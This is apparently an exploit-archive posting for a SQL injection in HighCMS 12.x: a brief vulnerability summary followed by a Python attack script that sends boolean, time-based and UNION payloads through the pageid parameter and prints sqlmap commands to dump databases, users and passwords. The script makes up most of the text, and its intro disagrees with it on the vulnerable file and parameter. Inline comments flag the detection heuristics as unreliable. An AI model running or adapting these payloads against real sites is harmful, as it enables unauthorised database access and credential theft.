HighCMS 12.x SQL Injection
HighCMS 12.x suffered from a critical SQL Injection vulnerability, primarily affecting versions prior to 12.0.1. This flaw allowed unauthenticated attackers to inject malicious SQL queries into the application's database.

The vulnerability typically resided in parameters like `id` within core files (e.g., `index.php`), where user-supplied input was not properly sanitized before being incorporated into SQL statements. Attackers could exploit this to manipulate database queries, often through blind or time-based SQL injection techniques.

Successful exploitation could lead to:
* Extraction of sensitive database information (user credentials, administrative data, private content).
* Potential full database compromise.

The severity was high due to its unauthenticated nature and potential for widespread data theft. Users were strongly advised to update to HighCMS 12.0.1 or later, which implemented robust input validation and parameterized queries to mitigate this vulnerability.

=============================================================================================================================================
| # Title : HighCMS v12.x SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://aryanic.com/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/167170/


[+] Summary :

A critical SQL Injection vulnerability affects HighCMS/HighCMS version 12.x.
The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.


[+] POC : python poc.py

#!/usr/bin/env python3
"""
HighCMS/HighCMS v12.x SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in pageid parameter
"""

import requests
import sys
import urllib3
from argparse import ArgumentParser

# Silence urllib3's InsecureRequestWarning. Every request below is sent with
# verify=False (TLS certificate validation disabled), so without this each call
# would print that warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class HighCMSExploit:
"""Driver for the HighCMS ``pageid`` SQL injection proof of concept.

Every request goes to ``<target>/index.jsp`` with the injected value in the
``pageid`` query parameter (``siteid`` is sent twice and ``fkeyid`` empty,
exactly as in the URL template repeated in each method). Certificate
validation is disabled (``verify=False``) on all requests.

Detection note: the probes are recognisable server-side by SQL keywords in
``pageid`` (``UNION SELECT``, ``SLEEP(``, ``AND '1'='1``) and by the fixed
User-Agent string set in ``__init__``.
"""
def __init__(self, target: str):
"""Store the base URL (trailing slash removed) and open a session with
browser-like default headers. No request is sent here."""
self.target = target.rstrip('/')
self.session = requests.Session()
# Headers imitate a desktop browser; the User-Agent is a constant string and
# therefore a stable fingerprint of this script in access logs.
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
})

def check_vulnerability(self) -> bool:
"""Send four ``pageid`` payloads and report whether any indicator fired.

Returns True at the first of: a delay of 5 s or more on the SLEEP payload,
one of the listed database error fragments in the response body, or a body
difference between the ``'1'='1`` and ``'1'='2`` requests. Each indicator
is a heuristic (see the inline notes); none of them parses the page, so a
True result is a reason to triage, not a confirmed finding.
"""
print(f"[*] Checking vulnerability for: {self.target}")

# Probes: a boolean pair, one time-based payload and one UNION payload. The
# UNION payload gets no dedicated check; it only feeds the error-string scan.
test_payloads = [
"6528' AND '1'='1",
"6528' AND '1'='2",
"6528' AND SLEEP(5)--",
"6528 UNION SELECT 1,2,3,4,5--"
]

vulnerable = False

for payload in test_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"

try:
# Time-based test: wall clock around a single GET, capped by timeout=10.
# Any response slower than 5 s -- including plain network or server
# latency -- is counted as confirmation, so slow hosts give false positives.
if "SLEEP" in payload:
import time
start_time = time.time()
response = self.session.get(url, timeout=10, verify=False)
end_time = time.time()

if end_time - start_time >= 5:
print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
vulnerable = True
break
else:
response = self.session.get(url, timeout=10, verify=False)

# Error-based test: case-insensitive substring match for common DBMS
# error fragments anywhere in the body (including unrelated page text).
error_indicators = [
"SQL syntax",
"Microsoft OLE DB Provider",
"ODBC Driver",
"SQLServer",
"Unclosed quotation mark",
"syntax error"
]

for error in error_indicators:
if error.lower() in response.text.lower():
print(f"[+] Error-based SQL Injection confirmed!")
print(f"[+] Payload: {payload}")
vulnerable = True
break

# Boolean-based test: true_response is bound only on the '1'='1' iteration
# and only if it returned 200; otherwise the comparison below raises
# UnboundLocalError, which the except clause reports as a payload error.
# Any dynamic content (timestamps, nonces, session-bound markup) also makes
# the two bodies differ, so a difference alone is weak evidence.
if "'1'='1" in payload and response.status_code == 200:
true_response = response.text

if "'1'='2" in payload and response.status_code == 200:
false_response = response.text

if true_response != false_response:
print(f"[+] Boolean-based SQL Injection confirmed!")
vulnerable = True
break

# Broad catch: timeouts, connection errors and the unbound-name case above
# all land here and are only printed before moving to the next payload.
except Exception as e:
print(f"[-] Error testing payload {payload}: {e}")
continue

return vulnerable

def exploit_union(self, columns: int = 5) -> bool:
"""Try ``UNION SELECT NULL,...`` with 1..``columns`` NULLs and call
``extract_data`` on the first count that is accepted.

"Accepted" means only: HTTP 200 and the substring ``error`` absent from the
body. A page that ignores a malformed ``pageid`` and renders normally also
satisfies this, so a reported success is not proof that the UNION ran.
Returns True after the first accepted count, False if none was accepted.
"""
print(f"[*] Attempting UNION-based exploitation with {columns} columns")

# Column-count search; the response is never inspected beyond the two
# conditions below.
for col_count in range(1, columns + 1):
nulls = ','.join(['NULL'] * col_count)
payload = f"6528 UNION SELECT {nulls}--"

url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"

try:
response = self.session.get(url, timeout=10, verify=False)

if response.status_code == 200 and "error" not in response.text.lower():
print(f"[+] UNION injection successful with {col_count} columns")

# Hands off to extract_data, which ignores col_count (see its docstring).
self.extract_data(col_count)
return True

except Exception as e:
print(f"[-] Error with {col_count} columns: {e}")

return False

def extract_data(self, column_count: int) -> None:
"""Send version and current-user UNION payloads.

Despite the log messages, nothing is extracted: the response body is never
parsed or printed, and ``column_count`` is unused because every payload
hard-codes five columns. The "extracted" lines mean only that a request
completed (version: with HTTP 200; user: without raising).
"""
print("[*] Extracting database information...")

# Three version probes for different DBMS dialects; the first one answered
# with HTTP 200 ends the loop regardless of what the body contains.
version_payloads = [
"6528 UNION SELECT 1,@@version,3,4,5--",
"6528 UNION SELECT 1,version(),3,4,5--",
"6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
]

for payload in version_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"

try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200:
# The response is not examined; this message is printed on any 200.
print("[+] Database version information extracted")
break
# Bare except swallows every exception type, including KeyboardInterrupt.
except:
continue

# Current-user probe; the message is printed whenever the GET does not raise,
# independent of status code or body.
user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"

try:
response = self.session.get(url, timeout=10, verify=False)
print("[+] Current user information extracted")
except:
pass

def generate_sqlmap_command(self) -> None:
"""Print four ready-made sqlmap invocations for the same URL template.

Nothing is executed here. ``sqlmap_cmd`` is assigned but never used; the
printed commands repeat the URL inline instead.
"""
sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'

print("\n[+] SQLMap Commands:")
print("=" * 50)
print("# Basic detection:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')

print("\n# Full database dump:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')

print("\n# Get database users:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')

print("\n# Get database passwords:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')

def main() -> None:
"""Parse the command line and dispatch to check / exploit / sqlmap mode.

``--check``, ``--exploit`` and ``--sqlmap`` are tested in that order with
``elif``, so when several are given only the first in that order takes
effect. With no mode flag, the vulnerability check runs and the other modes
are suggested.
"""
# The banner's box-drawing characters appear as '?' here -- presumably an
# encoding loss in the copy this listing was taken from.
banner = """
??????? ?????????? ??????? ??? ?????????????? ?????? ??? ??????
???????? ??????????????????????? ?????????????? ?????? ????????????
????????? ????? ?????? ?????? ?????????????????????????? ????????
???????????????????????? ?????? ?????????????????????????? ????????
?????? ??????????????????????????????????????????? ?????? ?????? ???
?????? ???????????? ??????? ??????? ??????????? ?????? ?????? ???

HighCMS/HighCMS v12.x SQL Injection Exploit
By: indoushka
"""
print(banner)

# -u is mandatory; argparse exits with its own usage message when it is missing.
parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
parser.add_argument('--check', action='store_true', help='Check vulnerability only')
parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')

args = parser.parse_args()

# Construction only prepares the session; no request is sent until a mode runs.
exploit = HighCMSExploit(args.url)

if args.check:
if exploit.check_vulnerability():
print("\n[!] Target is VULNERABLE to SQL Injection")
else:
print("\n[!] Target does not appear to be vulnerable")

# --exploit runs the heuristic check first and only proceeds on a positive
# result; the return value of exploit_union() is not reported.
elif args.exploit:
if exploit.check_vulnerability():
print("\n[*] Starting exploitation...")
exploit.exploit_union()

# --sqlmap prints commands only; nothing is sent to the target in this branch.
elif args.sqlmap:
exploit.generate_sqlmap_command()

else:
# Default: check and provide options
if exploit.check_vulnerability():
print("\n[+] Vulnerability confirmed!")
print("\nAvailable options:")
print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
else:
print("\n[-] Target not vulnerable or not accessible")

# Entry point. With no arguments at all a short usage text is printed and the
# process exits with status 1; with any argument, argparse inside main()
# enforces the required -u option.
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python highcms_exploit.py -u https://target.com")
print("Options: --check, --exploit, --sqlmap")
sys.exit(1)

main()


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================